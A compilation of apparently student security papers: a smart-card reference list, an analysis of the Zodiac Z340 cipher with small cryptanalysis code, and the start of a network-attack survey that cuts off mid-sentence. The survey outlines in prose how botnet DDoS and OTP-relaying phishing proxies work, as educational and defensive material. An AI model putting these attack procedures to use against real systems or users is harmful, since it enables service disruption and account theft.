2. Durability of Smart Cards for Government eID, http://www.datacard.com/downloads/ViewDownLoad.dyn?elementId=repositories/downloads/xml/govt_wp_smartcard_durability.xml&repositoryName=downloads&index=8
3. Smart Card Alliance. EMV: Frequently Asked Questions, http://www.smartcardalliance.org/pages/publications-emv-faq#q15
4. Smart Card Alliance. EMV: Facts at a Glance, http://www.smartcardalliance.org/resources/pdf/EMV_Facts_081111.pdf
5. Chip and PIN, http://www.smartcard.co.uk/Chip%20and%20PIN%20Security.pdf
6. VISA. Chip Terms Explained: A Guide to Smart Card Terminology, http://www.visaasia.com/ap/center/merchants/productstech/includes/uploads/CTENov02.pdf
7. Cotignac Blog. EMV Offline Data Authentication, http://cotignac.co.nz/blogs/11December2008.html
8. e-EMV: Emulating EMV for Internet Payments Using Trusted Computing Technology, http://digirep.rhul.ac.uk/file/03ef906a-ba3d-6978-8202-864e1a5f9942/1/RHUL-MA-200610.pdf
9. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
10. VISA. General PED Frequently Asked Questions, http://www.secureretailpayments.com/resources/visa-ped-faq.pdf
11. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
12. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
13. EMV Contactless Communication Protocol, Cards Tech & Security, http://www.ects.net/en/article.asp?/41.html
14. Strong Encryption Package: Triple DES Encryption, http://www.tropsoft.com/strongenc/des3.htm
15. Advanced Encryption Standard (AES), http://www.vocal.com/cryptography/aes.html
16. Key-Based Encryption: Rivest Shamir Adleman (RSA), http://library.thinkquest.org/27158/concept2_4.html
17. Elliptic Curve Cryptography: An Implementation Tutorial, http://www.reverseengineering.info/Cryptography/AN1.5.07.pdf
18. How Thieves Bypass Bank Card PINs, http://www.thisismoney.co.uk/money/saving/article1614798/How-thieves-bypass-bank-card-Pins.html
19. Chip and Spin, http://www.chipandspin.co.uk/spin.pdf
20. 3-D Secure: A Critical Review of 3-D Secure and Its Effectiveness in Preventing Card-Not-Present Fraud, http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908599
21. Defending Against Wedge Attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
22. EMV PIN Verification "Wedge" Vulnerability, http://www.cl.cam.ac.uk/research/security/banking/nopin/
23. Defending Against Wedge Attacks in Chip & PIN, http://www.lightbluetouchpaper.org/2009/08/25/defending-against-wedge-attacks/
24. EMV (Chip and PIN) Project, http://www.scribd.com/doc/50776161/27/CardholderVerification-Methods
25. 63% of Consumers Prefer Credit Card Verification by Fingerprint over PIN, Signature or Photo, http://www.banktech.com/architecture-infrastructure/227900120
26. Chip and Spin! Examining the Technology Behind the "Chip and PIN" Initiative, http://www.chipandspin.co.uk/problems.html
27. Chip & PIN (EMV) Relay Attacks, http://www.cl.cam.ac.uk/research/security/banking/relay/
28. Contactless Technology Security Issues, http://www.chipublishing.com/samples/ISB0903HH.pdf
29. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
30. Cryptography and Key Management, http://www.smartcard.co.uk/tutorials/sct-itsc.pdf
31. My Money Skills. Is There a Smart Card in Your Future? http://www.mymoneyskills.pk/english/cd/uc/future.jsp
32. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
33. Smart Card Technology: Past, Present, and Future, http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
34. The Future of Smart Card Technology is Here Today, or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html
35. The Future of Smart Card Technology is Here Today, or Is It? http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html
36. Performing Relay Attacks on ISO 14443 Contactless Smart Cards Using NFC Mobile Equipment, http://www.sec.in.tum.de/assets/studentwork/finished/Weiss2010.pdf
37. Buy Things with Mobile Phones? This May Be Reality from Mid-2012, http://www.todayonline.com/Singapore/EDC111026-0000201/Buy-things-with-mobilephones?-This-may-be-reality-from-mid-2012
38. TODAYonline | Singapore | Consortium to Bring NFC Shopping to Singapore by 2012, http://www.todayonline.com/Singapore/EDC111025-0000502/Consortium-to-bring-NFCshopping-to-Singapore-by-2012
Analysis of Zodiac-340 Cipher
Yuanyi Zhou, Beibei Tian, Qidan Cai
National University of Singapore, Information System
Computing 1
13 Computing Drive
Singapore 117417
Abstract. With the ubiquity of personal computers and software, complex arithmetic calculations have become possible in areas such as crime solving, military analysis, and medical research, because computers can run through a large number of possible combinations much faster than human brains can. However, many encryption methods are designed to require an enormous amount of time to break. Even with the help of computers, some problems remain unsolved due to their complexity; one of them is the Zodiac Z340 [1].
Keywords: The main purpose of our project is to decrypt the Zodiac-340 cipher.
1 Introduction
The serial killer Zodiac, who terrorized Northern California in the late 1960s, sent four ciphers to the local press. The ciphers were claimed to document his crimes, but only one of the four has been successfully decoded, keeping the identity of the killer unknown. Nevertheless, a sketch (Figure 1) of the Zodiac killer was drawn based on witness testimonies [2]. Although the killer may have passed away already, the effort to solve his ciphers is still ongoing.
Figure 1. Sketch of the Zodiac killer based on witness testimonies [2]
2 Background
The objective of our research is to narrow down the methods that could have been used to encrypt the message. The first cipher to be decoded is called Z408. Among the remaining three, Z340 is the most commonly attempted, while the other two have hardly been attempted because of the brevity of their messages. One is Z13, which is believed to reveal the name of the killer; the other is Z32, sent because the killer was upset that no one followed his wishes to wear the buttons.
2.1 Findings from Z408
Z408 was encrypted as a homophonic substitution cipher. The plaintext (with the killer's original misspellings preserved) is:
“I like killing people because it is so much fun It is more fun than killing wild game in the forrest because man is the most dangerous anamal of all To kill something gives me the most thrilling experence It is even better than getting your rocks off with a girl The best part of it is that when I die I will be reborn in paradice and all the I have killed will become my slaves I will not give you my name because you will try to slow down or stop my collecting of slaves for my afterlife.”
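A homophonic substitution cipher like Z408 assigns several cipher symbols to frequent letters, flattening the letter-frequency statistics that break a simple substitution. The toy sketch below illustrates the idea; the symbol table is invented for the example, and Zodiac's own table was larger.

```python
import random

# Toy homophonic substitution in the style of Z408. Frequent letters receive
# several cipher symbols ("homophones"); rare letters receive one. The table
# below is invented purely for illustration.

TABLE = {
    "E": ["1", "2", "3", "4"],   # common letters get many homophones
    "T": ["5", "6", "7"],
    "A": ["8", "9"],
    "I": ["!", "@"],
    "L": ["#", "$"],
    "K": ["0"],                  # rare letters get a single symbol
    "N": ["%"],
    "G": ["^"],
}
# Each symbol maps back to exactly one letter, so decryption is unambiguous.
INVERSE = {sym: letter for letter, syms in TABLE.items() for sym in syms}

def encrypt(plaintext: str) -> str:
    # each occurrence of a letter independently picks one of its homophones
    return "".join(random.choice(TABLE[c]) for c in plaintext)

def decrypt(ciphertext: str) -> str:
    return "".join(INVERSE[s] for s in ciphertext)

ct = encrypt("KILLING")
print(ct)  # repeated letters (L, I) may come out as different symbols
assert decrypt(ct) == "KILLING"
```

Because repeated letters need not repeat as symbols, simple frequency analysis fails, which is why homophonic ciphers are attacked with statistics such as the Index of Coincidence instead.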
Figure 2. Z408 part 1, sent to Vallejo Times-Herald on July 31, 1969, decoded on August 8,
1969
Figure 3. Z408 part 2, sent to San Francisco Chronicle on July 31, 1969, decoded on August 8,
1969
Figure 3. Z408 part 3, sent to San Francisco Examiner on July 31, 1969, decoded on August 8,
1969
2.2 Z340
Many conventional methods have been tried, including the one-time pad, double columnar transposition, polyalphabetic substitution, and homophonic substitution, but none has produced a result. Some creative ideas have also been proposed, such as Mr. Farmer's theory involving the Japanese play “帝 (Mikado)”, but none of them have been verified [3].
Figure 4. Z340, sent to the San Francisco Chronicle on November 8, 1969
2.3 Z13
Z13 was considered to be the killer’s attempt to disclose his name.
Figure 5. Z13, sent to San Francisco Chronicle on April 20, 1970
2.4 Z32
The last cipher was sent after the killer found that no one was following his instruction to wear the special buttons, which made him upset and led him to decide to pursue a further murder.
Figure 6. Z32, sent to San Francisco Chronicle on June 26, 1970
3. Prior possible decryption methods
3.1 The Z340 seems to be a completely meaningless message
We first considered that Z340 might be a completely meaningless message. However, after analyzing the whole case, we found that Zodiac seemed very proud of his killings and of not being caught by the police, and he continued to encrypt his identity into his letters to challenge the whole world. We therefore concluded that Z340 is genuine and contains important information about the killer's identity.
3.2 Web-based Dump analysis
Code-breakers have attempted to solve the Z340 for the past forty years without success. During these forty years, they have investigated the Z340 from multiple perspectives: (1) as a homophonic cipher similar to the Z408; (2) as a polyalphabetic cipher, an improvement on the Z408 encryption method; (3) as a double columnar transposition, another improvement on the Z408 method; and (4) as a one-time pad, an unbreakable encryption method when used properly.
All of these methods have failed to deliver any meaningful conclusion over those 40 years. Our group therefore concluded that, given the similarity between Z408 and Z340, Zodiac may have encrypted Z340 the same way as Z408, with homophonic substitution; but given how long the attempts have failed, he may instead have used an improved variant of the Z408 encryption method.
4. Analyzing the 340-cipher – what we did
Our group came up with and attempted the following ways to interpret the 340-cipher: (1) use the partial-break method to find the identification number of the Zodiac killer in the cipher; (2) the Holy Bible method; (3) analyze the special features of the 340-cipher; and (4) treat the 340-cipher as written using the Zodiac signature segmented into 12 equal 30-degree slices.
4.1 Partial break method
As the Zodiac killer claimed, the cipher contains his identity, so we guessed that it should contain an identification number of the killer. That is why we came up with the first method. We researched the format of American identification numbers in the 1960s and found that the identification number, known as the Social Security Number (SSN), contains nine digits [4].
Before we continue, we should introduce a website. While searching for information on the Zodiac ciphers, we found a very useful site, "http://oranchak.com/zodiac/webtoy/", which we will refer to as the "zodiac tool" in this report. Using this tool, we can replace any of the 62 Zodiac symbols with a chosen English character. We replaced every symbol with frequency lower than 2% (other than those already shown as "A") with "A" and tried to find a string of at least nine consecutive "A"s; symbols with higher frequency are less likely to be digits, which is why we tried the low-frequency symbols. The longest string we obtained had only five consecutive "A"s, as shown in Figure 7. This suggests that Z340 probably does not contain an SSN, and this method does not break Z340.
Figure 7. The result we obtained using the zodiac tool
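Our masking-and-search procedure can be sketched as follows. The function name, the 2% threshold, and the toy cipher string are stand-ins of our own, since the real search was done by hand in the zodiac tool.

```python
from collections import Counter
import re

# Sketch of the partial-break search described above: symbols whose relative
# frequency is below a threshold are masked to 'A', then we look for a run
# of consecutive 'A's long enough to hide a nine-digit SSN.

def longest_low_freq_run(cipher: str, threshold: float = 0.02) -> int:
    counts = Counter(cipher)
    n = len(cipher)
    # rare symbols become 'A', common symbols become '.'
    masked = "".join("A" if counts[c] / n < threshold else "." for c in cipher)
    runs = re.findall(r"A+", masked)
    return max((len(r) for r in runs), default=0)

# Toy stand-in for the cipher: frequent symbols X, Y, Z get masked out,
# while the five rare symbols a..e form the longest low-frequency run.
toy = "XYZXYZXYZ" * 10 + "abcde" + "XYZ" * 5
print(longest_low_freq_run(toy))  # 5 -- too short to hold a nine-digit SSN
```

Applied to Z340, the same idea produced a longest run of five, which is why we judged an embedded SSN unlikely.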
4.2 Holy Bible method
We noticed the sentence "when I die I will be reborn in paradice", which likely indicates that the killer believed in God, or at least in the resurrection of the body and the life everlasting, however horrible his deeds. As a killer, he might have considered himself a "Moses" who could kill people according to "words" from God, words he read from the Holy Bible and chose to show the public he was following. This religious link made us think hard about how the killer might have encrypted the message, and we saw two possible ways: 1) the cipher contains the names of books, chapters and verses; 2) only certain symbols are useful in giving a meaningful result.
The first way would take a long time because we are not familiar with all the books of the Holy Bible, so, with limited time, we chose to try the second. We mention the first possibility in this report to help people with a better understanding of the Holy Bible to decrypt the cipher.
For the second way, we used the zodiac tool to examine the symbols. According to the tool, one symbol has the highest frequency, which suggests that its occurrences probably carry the useful information. When we replaced every occurrence of that symbol with "J", we got a map of "J" strings.
Figure 8. Map of "J" strings in Z340
The “J”s appeared random, but their positions were readable. We conjectured that the
position of each “J” indicates a book and a chapter. For example, the top-left “J” is at
position (1, 2), which would indicate book 1, chapter 2, i.e. Genesis chapter 2. [5]
Verse 1: Thus the heavens and the earth, and all the host of them, were finished.
And the second “J”, at position (2, 5), indicates book 2, chapter 5, i.e. Exodus
chapter 5.
Verse 1: Afterward Moses and Aaron went in and told Pharaoh, “Thus says the
LORD God of Israel: ‘Let my people go, that they may hold a feast to Me in the
wilderness.’”
By this reading, the Z340 would contain only religious material, chosen by the killer to
“educate” his “slaves”, and would therefore not reveal the killer’s identity. However,
this is just one possible approach to the cipher, and it cannot be verified.
4.3 Analyzing the special features and IC
Let us take a closer look at the 340-cipher. We examine the symbol density map, the row
repeat map, the column repeat map, and the highlighted first occurrences of symbols
(Figures 9 to 12).
Figure 9: Symbol density map
Figure 10: Row repeat map
Figure 11: Column repeat map
Figure 12: Highlight first occurrences of symbols
The index of coincidence (IoC), entropy, and Chi² statistics are as follows.
IoC: 0.0194.
By row: 0 · 0 · 0 · 0.029 · 0.007 · 0.007 · 0 · 0.007 · 0.007 · 0.015 · 0 · 0 · 0 · 0.015 · 0 ·
0.007 · 0.015 · 0.022 · 0.007 · 0 (Average: 0.007).
By col: 0.005 · 0.026 · 0.026 · 0.016 · 0.011 · 0.042 · 0.011 · 0.011 · 0.021 · 0.021 ·
0.032 · 0.016 · 0.021 · 0.026 · 0.011 · 0.016 · 0.021 (Average: 0.017). Ratio to IoC of
random letters: 0.5468.
Entropy: 5.7453.
By row: 0.491 · 0.491 · 0.491 · 0.471 · 0.485 · 0.485 · 0.491 · 0.485 · 0.485 · 0.479 ·
0.491 · 0.491 · 0.491 · 0.479 · 0.491 · 0.485 · 0.479 · 0.473 · 0.485 · 0.491 (Average:
0.485).
By col: 0.571 · 0.548 · 0.551 · 0.563 · 0.565 · 0.537 · 0.565 · 0.565 · 0.553 · 0.553 ·
0.545 · 0.559 · 0.553 · 0.551 · 0.565 · 0.559 · 0.557 (Average: 0.473).
Chi2: 0.4039.
By row: 15.248 · 15.248 · 15.248 · 12.541 · 14.345 · 14.345 · 15.248 · 14.345 · 14.345
· 13.443 · 15.248 · 15.248 · 15.248 · 13.443 · 15.248 · 14.345 · 13.443 · 12.54 · 14.345
· 15.248 (Average: 14.436).
By col: 16.72 · 13.177 · 14.063 · 15.835 · 15.834 · 12.292 · 15.834 · 15.834 · 14.063 ·
14.063 · 13.177 · 14.949 · 14.063 · 14.063 · 15.834 · 14.949 · 14.949 (Average:
12.485).
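These statistics use the standard index of coincidence, IC = Σ nᵢ(nᵢ − 1) / (N(N − 1)) over the symbol counts nᵢ. A minimal sketch of how the overall and per-row values above can be computed (the 17-column layout matches the cipher; the function names are ours):

```python
from collections import Counter

def index_of_coincidence(text):
    """IC = sum(n_i * (n_i - 1)) / (N * (N - 1)) over symbol counts n_i."""
    n = len(text)
    if n < 2:
        return 0.0
    counts = Counter(text)
    return sum(c * (c - 1) for c in counts.values()) / (n * (n - 1))

def row_iocs(cipher, width=17):
    """Per-row IoC for a cipher laid out as a fixed-width grid."""
    rows = [cipher[i:i + width] for i in range(0, len(cipher), width)]
    return [index_of_coincidence(r) for r in rows]
```

A text of one repeated symbol gives IC = 1.0; a flat, random alphabet drives IC toward 1/|alphabet|, which is why the Z340's low value (0.0194) points to a homophonic flattening of frequencies.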
Figure 13.
There are two repeated trigrams in the 340-cipher (shown only as symbol images in the
original), both of which appear twice. The most frequent digrams, each appearing three
times, are likewise given as symbol images, with some seven other digrams repeated
twice. The ‘+’ symbol is the most frequently occurring symbol, with 24 occurrences in
all; it far exceeds all other symbols in frequency. The average number of characters
between repetitions of a symbol is 76.4, and the average number of repeated symbols per
line is 0.9.
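Counting repeated n-grams of this kind is straightforward; a small sketch (using plain characters in place of the cipher symbols):

```python
from collections import Counter

def repeated_ngrams(cipher, n):
    """Count every overlapping n-gram and keep those appearing twice or more."""
    grams = Counter(cipher[i:i + n] for i in range(len(cipher) - n + 1))
    return {g: c for g, c in grams.items() if c >= 2}

# Example: 'ABC' occurs twice, so it is reported as a repeated trigram.
repeats = repeated_ngrams("ABCXYZABC", 3)
```

Run with n = 2 and n = 3 over the 340 symbols, this reproduces the digram and trigram counts reported above.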
Comparing the first cipher with the 340-cipher offers some interesting facts. Both are
17 columns wide. Computing the index of coincidence for both the 340-cipher and the
first cipher gives roughly 0.02 in each case, which suggests that they are very similar
in design. The difference in the number of characters is interesting, as the 340-cipher
packs a larger cipher alphabet into fewer characters. This suggests that, if the
homophonic format was maintained, the alphabet was expanded to provide greater
security.
To examine some specifics, we looked at the symbols of the two repeated trigrams. All of
these symbols have a higher-than-average number of occurrences (10 to 12); in fact, ‘F’
is the most frequently occurring symbol after ‘+’. This would indicate that their
plaintext counterparts appear less frequently in English, assuming that the 340-cipher
is still some type of homophonic cipher. The lower-frequency letters of English,
starting from the bottom, are Z, J, X, Q, K, V, G, B, Y, W, M, F, P, U…, so to match
these, it would be useful to recognize a trigram drawn from these lesser-used letters.
Examining the behavior of the symbol ‘F’, it is followed by the symbol ‘B’ three times,
but preceded by ‘B’ once. It is also both followed and preceded, once each, by the
symbol ‘backwards K’. Since ‘F’ is both followed and preceded by ‘B’, let us examine the
behavior of ‘B’. It, too, is both followed and preceded by a symbol other than ‘F’,
namely ‘backwards Y’. This ‘backwards Y’ appears only five times in the text, suggesting
that it might stand for a very high-frequency letter. So these two symbols are each both
followed and preceded by two other symbols. This rules out ‘q’, which in English is
always followed by the same letter, ‘u’ (assuming no intentional misspelling).
We tried numerous combinations of replacements in the cipher, and each seemed to
hold some promise, but none of them proved sound upon further investigation.
One point that we believe deserves further investigation is the phenomenon noted
earlier in the first cipher, and its possible meaning for the second cipher. We noted
that the letter ‘A’ had been encrypted using two symbols that also encrypted ‘S’, and
that one of the encryptions of ‘A’ is the letter ‘S’ itself. Our reasoning is that,
rather than this being a mistake, it may have been a deliberate double encryption: the
‘A’ was encrypted as ‘S’, and the ‘S’ was then encrypted again into the two triangles.
Note also that one of those symbols is the triangle with a dot in the middle, which
plays a role in the fantastical analysis. Perhaps, then, there are multiple levels of
encryption in the second cipher.
4.4 Second attempt – Zodiac signature
The three methods above were our first attempt to solve the Z340. As none of them
worked, we decided to do more research on how the Z408 was cracked. The Z408, sent on
August 1st, 1969, was encrypted as a homophonic substitution cipher. One week later, on
August 8th, 1969, Donald and Bettye Harden, residents of Salinas, California,
successfully decrypted the cipher. The Hardens’ method was based on their deduction
that the message would contain the words “kill” and “I” [6].
We think that the Z340 is also encrypted by the homophonic method, as do many of the
code-breakers trying to solve the cipher. However, the Z408 was decrypted within one
week, so if the Z340 were encrypted in exactly the same way as the Z408, it should not
have remained a mystery for more than 40 years. Moreover, because the Z340 was sent
three months after the Z408 was broken, the Zodiac killer is likely to have devised
further tricks to make the Z340 even harder to break.
Based on the above analysis, we conclude that the Z340 is still a homophonic cipher,
but produced by an improved and harder method. While reading an article on how its
author thought the Z340 should be solved, we were struck by an idea: maybe the Zodiac
killer changed the order of the characters, and we should read the Z340 along the path
of the Zodiac signature. That is, we should read the cipher in circles instead of from
left to right and from top to bottom. Figure 15 shows the idea more clearly.
Figure 14. The Zodiac signature
Figure 15. The way we read the cipher
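One concrete reading order of this kind is a clockwise inward spiral over the grid; the sketch below is only one interpretation of the circular path (the actual signature path may differ):

```python
def spiral_read(grid):
    """Read a rectangular grid of symbols in a clockwise inward spiral,
    starting from the top-left corner."""
    out = []
    top, bottom = 0, len(grid) - 1
    left, right = 0, len(grid[0]) - 1
    while top <= bottom and left <= right:
        out.extend(grid[top][c] for c in range(left, right + 1))       # top row
        out.extend(grid[r][right] for r in range(top + 1, bottom + 1))  # right col
        if top < bottom and left < right:
            out.extend(grid[bottom][c] for c in range(right - 1, left - 1, -1))
            out.extend(grid[r][left] for r in range(bottom - 1, top, -1))
        top, left = top + 1, left + 1
        bottom, right = bottom - 1, right - 1
    return "".join(out)

# A 3x3 toy grid: the outer ring clockwise, then the centre.
reordered = spiral_read(["ABC", "DEF", "GHI"])  # -> "ABCFIHGDE"
```

Applied to the 17-column Z340 grid, such a reordering would be fed back into the homophonic solving tools; as noted below, none of the variants we tried produced readable text.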
Each of us tried to break the Z340 based on this idea, but none of us got any useful
information. There is a great deal of work involved, since we would have to resort to
brute force. Because of the time limit and the lack of manpower, we finally gave up
breaking the Z340 in this way.
5. Related work
A lot of work has been done on the Z340 cipher, and one website we value highly is the
zodiac tool, which was introduced in Section 4.1. Here we discuss this website,
http://oranchak.com/zodiac/webtoy/, in more detail, in three parts: the purpose of the
website, the functions it performs, and the results that have been obtained with it.
The purpose: the website helps code-breakers attack the Z340 cipher as a simple
monoalphabetic homophonic substitution. The zodiac tool’s developer believes that the
Z340 is encrypted by homophonic substitution because the Z408 was broken as such a
cipher.
Functions: Figure 16 shows how the website looks; it mainly contains seven parts. With
these, we can change any symbol to any English letter (parts 1 and 2) and automatically
obtain the corresponding letter frequencies after the change (part 6). Besides, we get
the decoded ciphertext automatically, which makes it more readable (part 4). The
website can even find words (part 4), which makes it easier to see whether we have
obtained useful results.
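The core of such a tool, applying a symbol-to-letter substitution and recomputing letter frequencies, can be sketched as follows (the mapping and cipher symbols here are invented for illustration):

```python
from collections import Counter

def decode(cipher, mapping):
    """Apply a symbol-to-letter substitution; unmapped symbols show as '.'"""
    return "".join(mapping.get(sym, ".") for sym in cipher)

def letter_frequency(decoded):
    """Relative frequency of each decoded letter, ignoring unmapped symbols."""
    letters = [c for c in decoded if c != "."]
    counts = Counter(letters)
    total = len(letters)
    return {c: counts[c] / total for c in counts}

mapping = {"%": "K", "@": "I", "#": "L"}
text = decode("%@##@%@", mapping)  # -> "KILLIKI"
freqs = letter_frequency(text)
```

Comparing the resulting letter frequencies with standard English frequencies (as the tool's part 6 does) is what lets a solver judge whether a trial mapping is plausible.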
Results: even with the help of this tool, nobody has yet broken the Z340. However, with
some substitutions, words such as halloween, killing, you, next, die, and zodiac can be
obtained.
Figure 16. The website: zodiac tool
6. Summary
To break the Z340 cipher, we used four main methods: partially breaking the cipher to
find the Zodiac killer’s identification number, finding clues from the Bible, reading
the cipher along the path of the Zodiac signature, and analyzing the special features
and IC of the 340-cipher. However, none of these four methods breaks the Z340.
The Z408 was broken in only one week; why does the Z340 remain a mystery after more
than 40 years? Is it just because the Zodiac killer increased the number of symbols, or
did he improve his encryption method? Advanced technology does not seem to help much in
breaking this cipher. Maybe we will come up with a strange idea during a tea break, and
it will turn out to be exactly the answer!
References:
1. Voigt, T. (November 4, 2007). Zodiac Letters. Retrieved October 10, 2011 from
http://www.ZodiacKiller.com/Letters.html
2. Wikipedia The Free Encyclopedia. (October 5, 2011). Zodiac Killer. Retrieved October 10,
2011 from
http://en.wikipedia.org/wiki/Zodiac_Killer
3. Farmer, C. (2007). The Zodiac 340 Cipher Solved. Retrieved October 10, 2011 from
http://www.opordanalytical.com/articles1/zodiac-340.htm
4. Wikipedia The Free Encyclopedia. (October 6, 2011). Social Security Number. Retrieved
October 10, 2011 from
http://en.wikipedia.org/wiki/Social_Security_number
5. Holy Bible (New King James Version,1982). Thomas Nelson, Inc.
6. Thang, D. (December 2007). Analysis of the Zodiac Z340. A Project Report Presented to the
Faculty of the Department of Computer Science, San Jose State University. Page 17.
The sampler of network attacks
Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad, and
Siti Najihah Binte Jalaludin
School of Computing, National University of Singapore, Computing 1, 13
Computing Drive, Singapore 117417, Republic of Singapore
{u0907064, u0907056, u0807104, u0907055}@nus.edu.sg
Abstract. Attacks over the years have become both increasingly numerous and
sophisticated. Computer and network systems fall prey to many attacks of different
forms. To reduce the risks associated with such attacks, it is imperative that
organizations and individuals understand and assess them, and make prudent decisions
about the defenses to put in place. Understanding the characteristics of network
attacks allows better decisions in selecting the appropriate barriers. To develop this
understanding, we have chosen to classify four network attacks in a comprehensive
manner, namely Distributed Denial of Service, Man-in-the-Middle, Spoofing, and
Keylogger attacks. This paper focuses on the categorization of these network attacks,
thus providing a greater comprehension of them along different dimensions. In addition,
the paper explores the case of the recent attack on Sony, in relation to these network
attacks.
1. Introduction
The evolution of technology has allowed most organizations to conduct their operations
over the Internet, regardless of their geographic location. However, the reach of the
Internet has also led to an increase in system attacks over the years.
As seen in Fig. 1 (refer to Appendix A: System Attacks Frequency), most organizations
are susceptible to system attacks. In addition to viruses, worms and Trojans, the next
top three attacks that organizations face are malware, botnets and web-based attacks.
We provide an in-depth analysis of such attacks later in this report.
Besides that, the motivation of attackers has also evolved over the years. Ten years
ago, it was mainly driven by the curiosity of learning more about a system. Over the
years, attackers have become more aggressive, and motivations lean increasingly toward
financial gain.
In this report, four different types of system attacks will be discussed, namely
Distributed Denial of Service, Man-in-the-Middle, Spoofing and Keylogger attacks. For
each attack we cover its history, the motivations behind it, and how it is carried out.
Thereafter, the network attacks are classified according to different factors, followed
by the discussion of a case study on the attack on Sony. The terms “attacker”,
“intruder” and “hacker” are used interchangeably throughout this report.
2. Our Approach
We will show how the four system attacks can be classified along four different
dimensions: CIA Triad Classification, Scale of Severity Classification, Probability of
Occurrence Classification, and Probability of Detection Classification. Three of the
four classifications are based on two methodologies: the National Institute of
Standards and Technology (NIST) Risk Management Guide and Michael Whitman’s risk
assessment methodology. The CIA classification is based on the CIA Triad information
security model.
The Probability of Occurrence and Probability of Detection classifications are based on
NIST’s risk assessment methodology. The objective of these classifications is to
estimate the probability of such attacks using a qualitative approach. Since it is
difficult to justify quantitatively how often an attack occurs and how easily it can be
detected, the NIST approach provides a basis for deriving the probability from our
analysis of the environment of the system attacks. The Scale of Severity Classification
is based on Michael Whitman’s risk assessment methodology, which uses quantitative
measures such as weighted scores to evaluate the value of each criterion; the weighted
score of each criterion allows us to compute the total weighted score and determine the
overall ranking.
3. Types of Attacks
3.1 Distributed Denial Of Service
Distributed denial of service (DDoS) attacks involve many computers and connections,
flooding the target server with requests. DDoS attacks employ standard TCP/IP messages,
taking advantage of weaknesses in the IP protocol stack to disrupt Internet services.
Many DDoS attacks are sourced from bot networks, or botnets. Defenses built upon
observing large volumes of packets coming from a single source fail, as DDoS traffic
comes from all over the network.
Historical perspective. The first DDoS attack occurred in August 1999, when a DDoS
tool called Trinoo was deployed on at least 227 systems. This flooded a single computer
in Minnesota, and the system was down for more than two days. Yahoo! also became a
victim of a DDoS attack, becoming inaccessible for 3 hours and suffering a loss of
about $500,000. Such attacks cause victims either to stop functioning completely or to
slow down significantly. One worrying aspect of DDoS attacks is that the handler gets
to choose the location of the agents.
Motivations. DDoS attacks are launched not to steal sensitive information, but to
render target systems inaccessible, preventing legitimate users from using a specified
network resource. Other incentives include political “hacktivism” or just plain old
ego.
How DDoS is carried out. The steps are as follows:
Step 1: An intruder searches for systems on the Internet that can be compromised, for
example by using a stolen account on a system with a large number of users or via
inattentive administrators. Many such systems are found on university campuses. (Refer
to Appendix B: Distributed Denial of Service, Fig. 2)
Step 2: The intruder loads the compromised system with hacking tools such as DDoS
programs. This compromised system (i.e. the DDoS master, or handler) finds other
Internet hosts on which it can install its DDoS daemons (agents, or zombies). A daemon
is a compromised host that runs a special program. The intruder searches for systems
running services with security vulnerabilities by scanning large ranges of IP network
address blocks. This is when the initial mass-intrusion phase happens.
Step 3: The subsequently exploited systems, loaded with the DDoS daemons, carry out
the actual attack (refer to Appendix B: Distributed Denial of Service, Fig. 3). The
zombie program can be planted on the infected hosts via an attachment to spam email.
Communication from the zombie to its master can be hidden by using standard protocols
such as HTTP, IRC, ICMP or even DNS.
Step 4: The intruder maintains a list of owned systems, consisting of the compromised
systems running the agents. The actual DDoS attack phase occurs when the intruder runs
a program at the master system, informing the agents to launch the attack on the
victim. (Refer to Appendix B: Distributed Denial of Service, Fig. 4)
3.2 Man-in-the-Middle
A Man-in-the-Middle (MITM) attack is a type of active attack in which an attacker
intrudes into the communication between two victims to intercept the data being
transferred and to inject false information.
Users are usually unaware of whether they are really visiting the genuine website; it
takes a great deal of skill to differentiate between an authentic and a bogus site.
The attacker establishes connections with the victims and relays messages between
them, causing the victims to believe that they are communicating over a private
connection, when in fact the attacker is controlling and monitoring their activities
with malicious intent.
Historical Perspective. One of the earliest known MITM attacks was carried out with
the Aspidistra transmitter during World War II. Aspidistra was a British medium-wave
radio transmitter used for black propaganda and military deception. It intruded into
German radio frequencies by transmitting on them when German radio transmitters were
switched off during air raids, retransmitting the network broadcast as if it were
still on air, thus making it sound as if it came from official German sources. The
Aspidistra operators modified news broadcasts by inserting false content and
pro-Allied propaganda, causing panic and confusion among listeners.
Motivations. The motivation behind a MITM attack is to gain unauthorized access to
accounts and take advantage of their privileges to modify or steal data for financial
gain. Attackers may also act to deny authorized users the use of online services and
resources.
How MITM is carried out. A common MITM attack is the phishing attack on web-based
financial systems.
Phishing Attacks on Web-based Financial Systems. Phishing aims to gain control of a
customer’s information by behaving as a proxy between the customer and the real
web-based application. The affected users are typically customers of e-business
services and financial systems, where identity theft is performed on the unsuspecting.
The attacker aims to interpose between a customer and a merchant bank by enticing the
customer to enter their credentials on a bogus bank website. The customer enters their
credentials and the one-time code from a token (if the website requires two-factor
authentication). Even when two-factor authentication is in place, it provides no
protection against this phishing attack, since the attacker can relay the one-time
code in real time.
All this is done with the customer completely unaware that a MITM attack is ongoing.
The attacker can then use the credentials on the real banking website to access the
customer’s bank account and carry out malicious activities, such as performing
fraudulent transactions directly with the bank. Through techniques such as DNS cache
poisoning, future transactions can be directed to the malicious proxy server instead
of the real bank’s server.
Both HTTP and HTTPS communications are vulnerable to phishing attacks. Attacks on HTTP
connections are carried out with the attacker establishing a simultaneous connection
between the customer and the real site, proxying all communications between the
customer and the bank in real time. In the case of HTTPS connections, the attacker’s
proxy establishes one SSL connection with the customer and another between itself and
the bank’s server, allowing the attacker to capture and record all traffic in an
unencrypted state.
3.3 Spoofing
Spoofing is a situation in which a person or a program masquerades as someone else by
modifying data to gain unauthorized access to a system. Spoofing has become
“increasingly popular across the wireless network”, and spoofing attacks “are usually
